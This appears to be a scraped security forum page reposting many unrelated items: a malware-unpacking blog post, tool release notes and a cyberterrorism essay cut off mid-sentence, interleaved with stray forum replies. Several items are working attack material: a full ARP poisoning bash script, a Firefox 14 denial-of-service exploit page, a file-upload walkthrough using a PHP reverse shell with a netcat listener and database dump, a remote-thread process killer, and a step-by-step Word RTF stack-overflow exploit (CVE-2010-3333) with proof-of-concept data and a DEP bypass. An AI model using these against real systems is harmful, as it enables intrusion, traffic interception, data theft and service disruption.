Nytro

[h=3]Using DLL Injection to Automatically Unpack Malware[/h]In this post, I will present DLL injection by means of automatically unpacking malware. But first, the most important question: [h=2]What is DLL Injection and Reasons for Injecting a DLL[/h] DLL injection is one way of executing code in the context of another process. There are other techniques to execute code in another process, but essentially this is the easiest way to do it. As a DLL brings nifty features like automatic relocation of code good testability, you don't have to reinvent the wheel and do everything on your own. But why should you want to injecting a DLL into a foreign process? There are lots of reasons to inject a DLL. As you are within the process address space, you have full control over the process. You can read and write arbitrary memory locations, set hooks etc. with unsurpassed performance. You could basically do the same with a debugger, but it is way more convenient to do it in an injected DLL. Some showcases are: creation of cheats, trainers extracting passwords and encryption keys unpacking packed/encrypted executables To me, especially the opportunity of unpacking and decrypting malware is very interesting. Basically, most malware samples are packed by the same packer or family of packers. In the following, I will shortly summarize how it works. [h=3][/h] [h=2]The Malware Packer[/h] In order to evade anti-virus detection, the authors of the packer have devised an interesting unpacking procedure. Roughly, it can be summarized in the following stages: First, the unpacker stub does some inconspicuously looking stuff in order to thwart AV detection. The code is slightly obfuscated, but not as strong as to raise suspicion. Actually, the code that is being executed decrypts parts of the executable and jumps to it by self-modifying code. In the snippet below, you see how exactly the code is modified. The first instruction of the function that is supposedly called is changed to a jump to the newly decrypted code. mov [ebp+var_1], 0F6h mov al, [ebp+var_1] mov ecx, ptr_to_function xor al, 0A1h sub al, 6Eh mov [ecx], al ; =0xE9 mov ecx, ptr_to_function ... mov [ecx+1], eax ; delta to decrypted code ... call eax As you can see (after doing some math), an unconditional near jmp is inserted right at the beginning of the function to be called. Hence, by calling a supposedly normal function, the decrypted code is executed. The decrypted stub allocates some memory and copies the whole executable to that memory. Them it does some relocation (as the base address has changed) and executes the entry point of executable. In the following code excerpt, you can see the generic calculation of the entry point: mov edx, [ebp+newImageBase] mov ecx, [edx+3Ch] ; e_lfanew add ecx, edx ; get PE header ... mov ebx, [ecx+28h] ; get AddressOfEntryPoint add ebx, edx ; add imageBase ... mov [ebp+vaOfEntryPoint], ebx ... mov ebx, [ebp+vaOfEntryPoint] ... call ebx Here, the next stage begins. At first glance it seems the same code is executed twice, but naturally, there's a deviation in control flow. For example, the the packer authors had to make sure that the encrypted code doesn't get decrypted twice. For that, they declared a global variable which in this sample initially holds the value 0x6E6C82B7. So upon first execution, the variable alreadyDecrypted is set to zero. mov eax, alreadyDecrypted cmp eax, 6E6C82B7h jnz dontInitialize ... mov alreadyDecrypted, 0 dontInitialize: ... In the decryption function, that variable is checked for zero, as you can see/calculate in the following snippet: mov [ebp+const_0DF2EF03], 0DF2EF03h mov edi, 75683572h mov esi, 789ADA71h mov eax, [ebp+const_0DF2EF03] mov ecx, alreadyDecrypted xor eax, edi sub eax, esi cmp eax, ecx ; eax = 0 jnz dontDecrypt Once more, you see the obfuscation employed by the packer. Then, a lengthy function is executed that takes care of the actual unpacking process. It comprises the following steps: gather chunks of the packed program from the executable memory space BASE64-decode it decompress it write it section by section to the original executable's memory space, effectively overwriting all of the original code fix imports etc. After that, the OEP (original entry point) is called. The image below depicts a typical OEP of an unspecified malware. Note that after a call to some initialization function, the first API function it calls is SetErrorMode. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Code at the OEP [/TD] [TD=class: tr-caption, align: center][/TD] [TD=class: tr-caption, align: center][/TD] [/TR] [/TABLE] [h=3]Weaknesses[/h] What are possible points to attack the unpacking process? Basically, you can grab the unpacked binary at two points: first, when it is completely unpacked on the heap, but not yet written to the original executable's image space, and second, once the malware has reached its OEP. The second option is the most common and generic one when unpacking binaries, so I will explain that one. Naturally, you can write a static unpacker and perhaps one of my future posts will deal with that. One of the largest weaknesses are the memory allocations and setting the appropriate access rights. As a matter of fact, in order to write to the original executable's memory, the unpacker grants RWE access to the whole image space. Hence, it has no problems accessing and executing all data and code contained in it. If you set a breakpoint on VirtualProtect, you will see what I mean. There are very distinct calls to this function and the one setting the appropriate rights to the whole image space really sticks out. After a little research, I found two articles dealing with the unpacking process of the packer (here and here), but both seem not aware that the technique presented in the following is really easily implemented. Once you have reached the VirtualProtect call that changes the access rights to RWE, you can change the flags to RW-only, hence execution of the unpacked binary will not be possible. So, once the unpacker tries to jump to the OEP, an exception will be raised due to missing execution rights. So, now that we know the correct location where to break the packer, how to unpack malware automatically? Here DLL injection enters the scene. The basic idea is very simple: start the binary in suspended state inject a DLL this DLL sets a hook on VirtualProtect, changing RWE to RW at the correct place as backup, a hook on SetErrorMode is set. Hence, when encountering unknown packers, the binary won't be executed for too long. [*]resume the process Some other things have to be taken care of, like correctly dumping the process and rebuilding imports, but these are out of the scope of this article. If you encounter them yourself and don't know how to handle them, just ask me ;-) It seems not too easy to find a decent DLL injector. Especially, one that injects a DLL before the program starts (if there is one around, please tell me). As I could not find an injector that is capable of injecting right at program start, I coded my own. You can find it at my GitHub page. It uses code from Jan Newger, so kudos to him. I'm particularly fond of using test-driven development employing the googletest framework ;-) [h=3]Conclusion[/h] The presented technique works very well against the unpacker. So far, I've encountered about 50 samples and almost all can be unpacked using this technique. Furthermore, all unpackers that overwrite the original executable's image space can be unpacked by this technique. In future posts, I will evaluate this technique against other packers. Eingestellt von Sebastian Eschweiler um 03:20 Sursa: Malware Muncher: Using DLL Injection to Automatically Unpack Malware

Disabling Antivirus Program(S) Description: PDF : - https://hacktivity.com/en/downloads/archives/185/ Bachelor’s Degree in Computer Science at Faculty of Software Engineering at College of Nyiregyhaza. He got more than 9 years of experience on the field of it security, mostly in designing and creating security related products like DLP (data lost prevention) solutions and system log collectors. He was a developer of a widely known open source tool syslog-ng. Currently working as an IT security consultant and researcher at the BDO MITM Kft. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Disabling Antivirus Program(S)

File Upload Exploitation File upload vulnerabilities consists a major threat for web applications.A penetration tester can use a file upload form in order to upload different types of files that will allow him to obtain information about the web server or even a shell.Of course shell is always a goal but a good penetration tester must not stop there.Further activities can be performed after the shell.The focus of these activities must be on the database.In this article we will see how we can obtain a shell from the exploitation of file upload on a Linux web server and how we can dump the database that is running on the system. Backtrack includes a variety of web shells for different technologies like PHP,ASP etc.In our example we will use the damn vulnerable web application which is written in PHP in order to attack the web server through the file upload.The web shell that we will use in our case it will be the php-reverse-shell. uploading the web shell Now we have to set our machine to listen on the same port as our web shell.We can do this with netcat and the command nc -lvp 4444.The next step is to go back to the web application and to try to access the URL that the PHP reverse shell exists.We will notice that it will return a shell to our console: Obtaining a shell So we have compromise the remote web server and we can execute further commands from our shell-like a simple ls in order to discover directories. Listing Directories Now it is time to dump the database.We will have to go to the directory with the name uploads because this directory has write permissions and it is visible to the outside world which means that we can access it and we can create a file.Then we can use the following command in order to dump the database to a file. mysqldump -u root -p dvwa > hacked_db.sql We already know that the user root exists because it is already logged into the system.Also it is very common the name of the application or of the company to be the database name so we will use the dvwa.The > sign will create a file inside the uploads directory with the name hacked_db.sql. Dumping the database to a file As we can see from the image above we had to provide a password.In this scenario we just pressed enter without submitting anything.In a real world penetration test it would be much more difficult however it is always a good practice to try some of the common passwords.The next two images are showing the dump of the dvwa database. Dump of DVWA database Dump of DVWA database 2 From the last image we can see that we even obtain the password hash of the admin which it can be cracked by using a tool like john the ripper.This is also important as we may want to have the admin privileges and into the application. Conclusion In this article we saw how we can obtain a shell by exploiting a file upload form of an application and how we can dump the database.Of course in a real world scenario it is more likely restrictions to be in place but it good to know the methodology and the technique that we must follow once we have managed to upload our web shell. Sursa: File Upload Exploitation

[h=2]Mozilla Firefox 14.0.1 Denial of Service Vulnerability[/h]Author: knowlegend <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FF-14.0.1 DoS-Exploit by Know v3.0</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="Description" content="FF-14.0.1 DoS-Exploit by Know v3.0" /> <script type="text/javascript" language="JavaScript"> var CrashIt = false; if (typeof CrashIt != 'undefined') { CrashIt = new XMLHttpRequest(); } if (!CrashIt) { try { CrashIt = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { CrashIt = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { CrashIt = null; } } } function load() { CrashIt.open('get','bla.php'); CrashIt.onreadystatechange = handleContent; CrashIt.send(null); return false; } function handleContent() { while(CrashIt.readyState != 4) { document.getElementById('inhalt').innerHTML = "pwnd"; } document.getElementById('inhalt').innerHTML = CrashIt.responseText; } </script> </head> <body onload="load();"> <div id="inhalt"></div> <body> </html> # 1337day.com [2012-12-23] Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

[h=3]Fast Network cracker Hydra v 7.4[/h] One of the biggest security holes are passwords, as every password security study shows. A very fast network logon cracker which support many different services, THC-Hydra is now updated to 7.4 version Hydra available for Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, Currently supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. Change Log New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!) Added support for win8 and win2012 server to the RDP module Better target distribution if -M is used Added colored output (needs libcurses) Better library detection for current Cygwin and OS X Fixed the -W option Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested Fixed HTTP Form module false positive when no answer was received from the server Fixed SMB module return code for invalid hours logon and LM auth disabled Fixed http-{get|post-form} from xhydra Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz) Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-) Added debug mode option to usage (thanks to Anold Black) Download THC-Hydra 7.4 Sursa: Fast Network cracker Hydra v 7.4 updated version download - Hacker News , Security updates

Arachni Web Application Security Scanner Framework Web application hacking is very common and there are so many tools that can exploit the web application vulnerabilities like SQL injection, XSS, RFI, LFI and others. The vary first step is to find the vulnerabilities on web application. Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. So in this article I will show you how to get and install arachni and how to launch your first attack against a web application. DownloadArachni Since I am on Linux backtrack 5 R1 but you can use other Linux distribution like ubuntu. Start the web mode of arachni. root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_web Now the question is how to edit Dispatchers of Arachni because without dispatchers arachni does not work. root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_rpcd Now click on the plug ins to choose the best plug ins then click on the module to select and unselected modules depends on your need. Now click on the start scan to run your first scan enter the URL of the target web application then simply start the attack, after sometimes you need to evaluate the report to get the vulnerabilities. Sursa: Arachni Web Application Security Scanner Framework Tutorial | Ethical Hacking-Your Way To The World Of IT Security

Ce e "mc" ala?

[h=2]ARP Poisoning Script[/h]The purpose of this script is to automate the process of ARP poison attacks.The attacker must only insert the IP address of the target and the IP of the Gateway.This script was coded by Travis Phillips and you can find the source code below: #!/bin/bash niccard=eth1 if [[ $EUID -ne 0 ]]; then echo -e "\n\t\t\t33[1m 33[31m Script must be run as root! 33[0m \n" echo -e "\t\t\t Example: sudo $0 \n" exit 1 else echo -e "\n33[1;32m#######################################" echo -e "# ARP Poison Script #" echo -e "#######################################" echo -e " 33[1;31mCoded By:33[0m Travis Phillips" echo -e " 33[1;31mDate Released:33[0m 03/27/2012" echo -e " 33[1;31mWebsite:33[0m http://theunl33t.blogspot.com\n33[0m" echo -n "Please enter target's IP: " read victimIP echo -n "Please enter Gateway's IP: " read gatewayIP echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n" echo -e "\t\t--==[Targets]==--" echo -e "\t\tTarget: $victimIP" echo -e "\t\tGateway: $gatewayIP \n\n" echo -e " [*] Enabling IP Forwarding \n" echo "1" > /proc/sys/net/ipv4/ip_forward echo -e " [*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n" xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" & fi ARP poison script Sursa: https://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/

[h=1]Samhain 3.0.9![/h]by Mayuresh on December 22, 2012 For open source HIDS lovers, we have an updated release of Samhain! It is the bugfixed Samhain version 3.0.9 ! Our original post about Samhain can be found here. Samhain 3.0.9 “The Samhain open source host-based intrusion detection system (HIDS) provides file integrity checking and logfile monitoring/analysis, as well as rootkit detection, port monitoring, detection of rogue SUID executables, and hidden processes. It has been designed to monitor multiple hosts with potentially different operating systems, providing centralized logging and maintenance, although it can also be used as standalone application on a single host. Samhain is an open-source multiplatform application for POSIX systems (Unix, Linux, Cygwin/Windows).“ Official change log for Samhain 3.0.9: Some build errors have been fixed. The ‘probe’ command for the server has been fixed (clients could be erroneously omitted under certain conditions). An option ‘IgnoreTimestampsOnly’ has been added to the Windows registry check (ignore changes if only timestamp has changed). Full scans requested by the inotify module will now only run at times configured for full scans anyway. [h=3]Download Samhain:[/h] Samhain 3.0.9 – samhain-current.tar.gz/samhain-3.0.9.tar.gz Sursa: Samhain version 3.0.9! — PenTestIT

GNUnet P2P Framework 0.9.5 Authored by Christian Grothoff | Site ovmj.org GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing. Changes: This release adds support for non-anonymous data transfers over multiple hops (if both publisher and replicator are using an anonymity level of zero). It fixes various bugs and includes cosmetic improvements in the gnunet-setup and gnunet-fs-gtk user interfaces. Download: http://packetstormsecurity.org/files/download/119046/gnunet-0.9.5.tar.gz Sursa: GNUnet P2P Framework 0.9.5 ? Packet Storm

Entropy Broker RNG 2.1 Authored by Folkert van Heusden | Site vanheusden.com Entropy Broker is an infrastructure for distributing cryptographically secure random numbers (entropy data) from one or more servers to one or more clients. Entropy Broker allows you to distribute entropy data (random values) to /dev/random devices from other systems (real servers or virtualised systems). It helps preventing that the /dev/random device gets depleted; an empty /dev/random-device can cause programs to hang (waiting for entropy data to become available). This is useful for systems that need to generate encryption keys, run VPN software or run a casino website. Changes: This release adds a Web interface for viewing usage statistics, per-user bandwidth limits, and many small fixes. Download: http://packetstormsecurity.org/files/download/119047/eb-2.1.tgz Sursa: Entropy Broker RNG 2.1 ? Packet Storm

Bluefog 0.0.2 Authored by Tom Nardi | Site digifail.com Bluefog is a tool that can generate an essentially unlimited number of phantom Bluetooth devices. It can be used to test Bluetooth scanning and monitoring systems, make it more difficult for attackers to lock onto your devices, or otherwise complicate the normal operation of Bluetooth devices. Technically, Bluefog can work with just one Bluetooth adapter, but it works much better when you connect multiple adapters. Up to four radios are currently supported simultaneously. Changes: This release is in the very early stages of development and there are some areas of the software which need attention and improvement. There is currently very little in the way of error checking. Download: http://packetstormsecurity.org/files/download/119045/bluefog-0.0.2.tar.gz Sursa: Bluefog 0.0.2 ? Packet Storm

Exista secimg.php pentru imagini, atat in posturi cat si in semnatura. Iar anonimizarea link-urilor (referrer)... Nu ai specificat DE CE ar fi necesara.

The Diviner - Digital Clairvoyance Breakthrough - Gaining Access To The Source Code And Server Side Structure Of Any Application Description: PDF : - https://hacktivity.com/en/downloads/archives/187/ Shay Chen is the CTO of Hacktics, an advanced security center of Ernst & Young. He is also a prominent blogger and researcher, and is responsible many security publications, including new application level attacks, various security tools comparison initiatives and two of the biggest researches performed in the field of automated security scanners (including the latest comparison of 60 web application scanners). In his current position in Hacktics, Shay is in charge of research, training, optimization, quality assurance and the constant improvement of Hacktics security services. He has over ten years in information technology and security, including a strong background in software development. Shay is an experienced speaker, and regularly instructs a wide variety of security related courses. Before moving into the information security field, he was involved in various software development projects in ERP, mobile & enterprise environments. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: The Diviner - Digital Clairvoyance Breakthrough - Gaining Access To The Source Code And Server Side Structure Of Any Application

[h=1]Using RtlCreateUserThread[/h]Author: zwclose7 This is the example usage of RtlCreateUserThread This program will create a remote thread that call ExitProcess within target process, cause the target process to exit Source code: #include <iostream> #include <Windows.h> using namespace std; typedef struct _CLIENT_ID { PVOID UniqueProcess; PVOID UniqueThread; } CLIENT_ID, *PCLIENT_ID; typedef long (*_RtlCreateUserThread)(HANDLE, PSECURITY_DESCRIPTOR, BOOLEAN,ULONG, PULONG,PULONG, PVOID,PVOID, PHANDLE,PCLIENT_ID); _RtlCreateUserThread RtlCreateUserThread; int main(){ HANDLE hThd; CLIENT_ID cid; DWORD pid; HMODULE ntdll=LoadLibrary("ntdll.dll"); HMODULE k32=LoadLibrary("kernel32.dll"); RtlCreateUserThread=(_RtlCreateUserThread)GetProcAddress(ntdll,"RtlCreateUserThread"); cin >>pid; HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,false,pid); RtlCreateUserThread(hProc,NULL,false,0,0,0,(PVOID)GetProcAddress(k32,"ExitProcess"),0,&hThd,&cid); WaitForSingleObject(hThd,INFINITE); CloseHandle(hThd); CloseHandle(hProc); FreeLibrary(k32); FreeLibrary(ntdll); return 0; } http://www.rohitab.com/discuss/index.php?app=core&module=attach&section=attach&attach_id=3746 Sursa: Using RtlCreateUserThread - rohitab.com - Forums

In-Memory Fuzzing in JAVA SWISS ETHICAL HACKING ©2012 High-Tech Bridge SA – www.htbridge.com In-Memory Fuzzing in JAVA 2012.12.17 Xavier ROUSSEL I. What is Fuzzing? Introduction Fuzzing process Targets Inputs vectors Data generation Target monitoring Advantages and drawbacks II. In Memory Fuzzing Why use in-memory Fuzzing? Principle Data injection example Building in-memory Fuzzer Creating loop in memory Advantages and drawbacks III. DbgHelp4J Presentation Key features Example Implementing in-memory Fuzzer IV. Real case study EasyFTP 1.7.0.11 I. What is fuzzing? Introduction - OWASP definition : “Fuzz testing or Fuzzing is a Black Box software testing technique, which basically consists in finding implementation bugs using malformed/semi-malformed data injection in an automated fashion.“ - Alternative to code review mainly used in white box testing. - Due to automated tests, fuzzing allows us to assess a software against a huge set of test cases in a few time. - Especially useful to test common applications implementations like FTP server or HTTP server. Download: www.exploit-db.com/download_pdf/23570

[h=1]Exploiting CVE-2010-3333[/h]Arun December 20, 2012 CVE 2010-3333 tells us two important things: that this is a stack-based buffer overflow, and that it has something to do with the RTF parser. What it doesn’t tell us is what on Earth we’re looking for. After all, Microsoft’s RTF spec is quite long, and there are too many things for us to fuss about to easily find out what the vulnerability is all about. Fortunately, by going over the relevant Metasploit module, or reading some analysis, we can conclude that the vulnerability lies in the parsing algorithm for the pFragments data array. You might ask yourself what this post will contribute, given that there’s already a Metasploit module and an analysis out there. Well, the analysis deals with Word 2003, which is really not relevant nowadays (or at least I would hope so), and the Metasploit module uses SEH overwrite to run the payload, which does not work on Word 2010 naturally. We aim to show you how to exploit this vulnerability on Word 2010 running on Windows 7, meaning we’ll have to deal with DEP and ASLR at the very least. First thing’s first – how do we even trigger the vulnerability? This is what the RTF spec has to say about the pFragments property: Property: pFragments Meaning: Fragments are optional, additional parts to the shape. They allow the shape to contain multiple paths and parts. This property lists the fragments of the shape. Type of value: Array Default: NULL What’s an “array” you ask? Here’s what the spec has to say about it: “Arrays are formatted as a sequence of numbers separated by semicolons. The first number tells the size of each element in the array in bytes. The number of bytes per element may be 2, 4, or 8. When the size of the element is 8, each element is represented as a group of two numbers. The second number tells the number of elements in the array.” An RTF file is really a text file containing formatting instructions (alongside the actual text) that get interpreted by the RTF parser. Naturally, it is bloated. The RTF spec states that, in order to use the pFragments property, we should at least have the following text in our RTF file: [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]{\rtf1{\shp{\sp{\snpFragments}{\sv<s>;;}}}} [/TD] [/TR] [/TABLE] What comes after “\sv” is an array, comprising the data for the pFragments property. According to the spec, <S> represents the size of each array element, and should be 2, 4 or 8, but it appears that any number can be used. It’s even better if the number is not 2, 4 or 8, as fewer checks are performed in the code. The <N> part tells us the number of elements in the array, but we’ll soon see that other numbers are actually used to calculate the size of the array. <DATA> is the contents of the array, written as a string of hexadecimal digits, where each two characters (digits) represent one byte, and the format of multi-byte values is little-endian. Fun fact: only lowercase letters can be used to represent the hex digits – uppercase letters will be treated as zeros. Just so you’d be able to keep records, wwlib.dll is at 0x6F870000 and mso.dll is at 0x6D2F0000. The version of both DLLs is 14.0.4734.1000. Let’s have a go at it. Load the following RTF file into an unpatched Word 2010: [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]{\rtf1{\shp{\sp{\snpFragments}{\sv 2;4;41414141414141414141414141414141}}}} [/TD] [/TR] [/TABLE] Here’s the result: Run that through the debugger and see where we crashed: We see that the crash is in mso.dll, when trying to read a value in memory through a corrupted pointer. Say we don’t follow the spec and use 1 instead of 2 as <S>: [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]{\rtf1{\shp{\sp{\snpFragments}{\sv 1;4;41414141414141414141414141414141}}}} [/TD] [/TR] [/TABLE] Now we get an access violation executing address 0. Now that’s interesting. Let’s take a look at the stack (the blue line represents the current value of ESP): Nice. We can see our ‘A’s on the stack, alongside many zeros, 4 of them comprising the return address (hence the exception). So yeah, we’ll stick to using 1 as <S>. Observe that the number of consecutive ‘A’s we see on the stack doesn’t correspond exactly to the number of ‘A’s in our data. Let’s try a different, larger sequence of formatted data, so we can see what goes where. This is a mixture of a simple “ABC…” and Metasploit’s pattern_create.rb’s output: [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]{\rtf1{\shp{\sp{\snpFragments}{\sv 1;4;4142434445464748494a4b4c4d4e4f5041613041613141613241613341613441613541613641613741613841613941623041623141623241623341623441623541623641623741623841623941633041}}}} [/TD] [/TR] [/TABLE] Let’s look at the crash this time: Click to Enlarge We get another access violation on a memory read. That’s not as good as the null pointer execution exception we had before. We also see that our string is on the stack, without the first 6 letters, ‘A’ to ‘F’. Various parts of our string are also on the stack, in DWORD quantities. We need to dig deeper into this. You can put a breakpoint on Read File just before opening the file and start there. Start right before the exception and try to climb back up, or just be creative. Let’s observe some notable pieces of code. Call the function in wwlib.dll that lexically parses the RTF file. This will result in calling various other functions to analyze the parsed text: 6FEE7615 E8 9AE1FAFF CALL wwlib.6FE957B4 Decoding <DATA> ends here: 6FEE950F 8B5D F0 MOV EBX,DWORD PTR SS:[EBP-10] Create a stream on the decoded data: 6FEE9522 FF15 F415676F CALL DWORD PTR DS:[<&ole32.CreateStreamOnHGlobal>; ole32.CreateStreamOnHGlobal Read the first 6 bytes of the decoded data as 3 words. Then check if word #1 is bigger than word #2 (it’s not, in our case): The following function call makes an additional check on the data (0x7ffffff / word #3 < word #2? No, in our case), and then computes the value of word #2 * word #3 and returns it: 6D2FA8A6 E8 4C000000 CALL mso.6D2FA8F7 The value of word #2 * word #3 is used as the size for a new memory allocation made by this function call: 6D2FA8A6 E8 4C000000 CALL mso.6D2FA8F7 Our decoded data (excluding the first 6 bytes) is then copied to that new memory allocation. Ok, so we now know why 6 of our bytes are gone, and what they should be (in general) in order to pass the checks. Where’s the buffer overflow? Why it’s right here: The function gets a 4-byte local variable as one of its parameters, and copies our entire data to that variable, thereby causing a stack-based buffer overflow. Note that the function we’re in right now is not protected by stack cookies (though there are some stack cookies spread around in other functions). Note the call at 0x6DCE3269 – if it returns 0, we go straight to the function’s epilogue, which is ended by “ret 0×14?. Check out the stack before running the function that smashes it: And after running the function: Ok, so now we need to find a way to quickly get out of our function, so we can use our overwritten return address. We need the function at 0x6DCE30CB to return 0. Let’s look at it: We get that if a certain value controlled by us is 0, the function will return 0 as well, which is exactly what we want. All we need to do is find that value in our RTF file, and replace it with “00000000.” Don’t forget to reverse the byte order when searching for the value. Here’s our POC RTF file: [TABLE] [TR] [TD=class: gutter]1 [/TD] [TD=class: code]{\rtf1{\shp{\sp{\snpFragments}{\sv 1;4;0100020000014142434445464748494a41613041613141613241434343433441613541613641613741613841613900000000623141623241623341623441623541623641623741623841623941633041}}}} [/TD] [/TR] [/TABLE] Notice it uses some minimal values for the first 3 words in: it has “00000000? for the check, and “43434343? to serve as the return address. Note that since this is a “ret 0×14? opcode, the stack pointer will be located right after our zeros when the function returns. Let’s test it: Unsurprisingly, we get an exception due to DEP. All of Word 2010 is ASLRed, which is really a shame for us, but there’s a DLL that gets loaded after Word 2010 is loaded, and that DLL does not support ASLR. The DLL is msgr3en.dll, and we can use it for our ROP payload. Some will have you believe that since the DLL is loaded only after Word has already finished loading itself, you can only exploit Word by selecting “Open” from the “File” menu (since by then Word has finished loading the DLL), and not by double-clicking the RTF file. If you create a large enough RTF file, the time it takes Word to load all the pages will be sufficiently long for the DLL to load as well, and so the exploit can use it to bypass DEP. Of course, you need to put your exploit code on the last page. I’ll let you finish the POC code by yourself. You can simply ask mona.py to generate the ROP chain for you, and get the shellcode from Metasploit. Place them one after the other immediately after the zeros (assuming you use the chain for VirtualProtect/call esp), and put a ROP-NOP as the return address, instead of 0×43434343. Sursa: InfoSec Institute Resources – Exploiting CVE-2010-3333

[h=1]Cyberterrorism Defined (as distinct from “Cybercrime”)[/h]Dimitar Kostadinov December 21, 2012 Introduction Technology is developing at an extremely vigorous pace over the last couple of decades. There are many unknown terms that come along with this rapid change. Often, the common people are not familiar with these new strange words ensuing from technological advancements and its interaction with the other branches of life. The purpose of this article is to help the reader understand the notion of cyberterrorism. Many controversial questions are set forth: “What is cyberterrorism?” “What is its objective?” “Are there any cases of cyberterrorism in real life?” “What is the difference between cyberterrorism and cybercrime?” Although there is much to be said on that increasingly popular subject, this contribution reveals some of the answers behind these tricky queries. Cyberterrorism The Definition So far, the international community has not decided on an exact definition of “terrorism” that can be applied universally. However, the United States Department of State prescribes the following definition of terrorism: “…premeditated, politically motivated violence perpetrated against non-combatant targets by sub-national groups or clandestine agents.” (Title 22 of the U.S. Code, Section 2656 f(d)) “Cyberterrorism” was coined by Barry Collin in the 1980?s. The fact that terrorism caused via kinetic force has not been unified yet in the international doctrine undoubtedly impeded determining a proper definition for its subcategory, , cyberterrorism. In a way, defining cyberterrorism is even more difficult because of the abstractness that is naturally implicated in understanding how certain events occur in cyberspace. According to NATO (2008), cyberterrorism is “a cyber attack using or exploiting computer or communication networks to cause sufficient destruction to generate fear or intimidate a society into an ideological goal.” Another definition of cyberterrorism is provided by the US National Infrastructure Protection Centre, a part of the Department for Homeland Security: “a criminal act perpetrated through computers resulting in violence, death and/or destruction, and creating terror for the purpose of coercing a government to change its policies.” (Wilson, 2003) Some scholars or politicians avoid labelling acts as cyberterrorism, insisting on the assertion that these acts are mere hacking or so-called hacktivism. In their view, cyber attacks cannot bring about the same amount of death, destruction, or fear as with more traditional forms of terrorism. The word “hacking” become known in the beginning of the 1970?s when Altair 8800, the first personal computer, was created. The purchaser had to not only assemble the machinery himself, but also had to install the software as well (Shinder, 2002). Let’s examine the derivative term “hacktivism.” This is a word which combines two actions – hacking and activism. In short, hacktivism stands for low-level computer network attacks or digital activity which cause in most cases only temporary nuisance. Like cyberterrorists, hacktivists pursue political goals, but their activity does not correspond quantitatively or qualitatively with the possible outcome of cyberterrorist acts (Stanley, 2010). The term “cyberterrorism” encompasses two other terms – cyberspace and terrorism. The word “cyber” designates what type of terrorism is being referred to. The prefix “cyber” originates from the ancient Greece and means “skilled in steering or governing.” Many scholars claim that this term might not match well, since the Internet (the cyberspace) is not digitally, electronically, or otherwise controlled. Nevertheless, the term is deemed to be more accurate than terms like “virtual space/world/universe/reality,” which have different existential context and therefore are not semantically appropriate. William Gibson first came up with the term “cyberspace” in his novel “Neuromancer” which was published in 1984. Nowadays, this term is widely known as the environment which the Internet creates – all the communication activities and interconnection of human beings through computer devices innate to this medium. One scholar defines cyberterrorism as the “convergence of terrorism and cyberspace.” Basically, the means and their application is the same as regular computer network attacks with the significant difference that in the case of cyberterrorism, the leading motive is to coerce the government or its citizens to comply with some political or social demands. Moreover, the act should result in violence or fear in order to be qualified as cyberterrorism. Minor attacks that disrupt services of no great importance are not cyberterrorist acts, yet they may prove a very expensive nuisance, in terms of economics (Stohl, 2007). Objectives Without any doubt, the emergence of the Internet and its wide-range spectrum of opportunities have influenced considerably the terrorists’ methods and behaviour. In his speech before the RSA Cyber Security Conference, the FBA Director Robert Mueller warned that despite the fact that terrorism still poses the number one threat, cyberterrorism may displace the conventional one from its prime position. One can identify three main objectives of cyberterrorism: Organizational This organizational objective of cyberterrorism includes functions like recruiting, instigation training, fundraising, communication, planning, spying, etc. Following the intelligence reports, terrorist groups nowadays recourse to the Internet on a daily-basis. Their knowledge and skills in regard to computer technology is steadily growing and this build-up of knowledge and skills would eventually provide the necessary expertise for finding and exploiting vulnerabilities in the online security systems of governments or critical infrastructure institutions (Wilson, 2005). Although those researching the terrorist use of the Internet often describe them as radical factions seeking some sort of virtual jihad, the actors committing cyberterrorism do not have to be religiously motivated. Furthermore, the organizational function of cyberterrorism enables the wrongdoers to pursue their objective either through the means of traditional warfare or technology (Brickey, 2012). Undermining Self-explanatory, the goal which terrorists seek to achieve 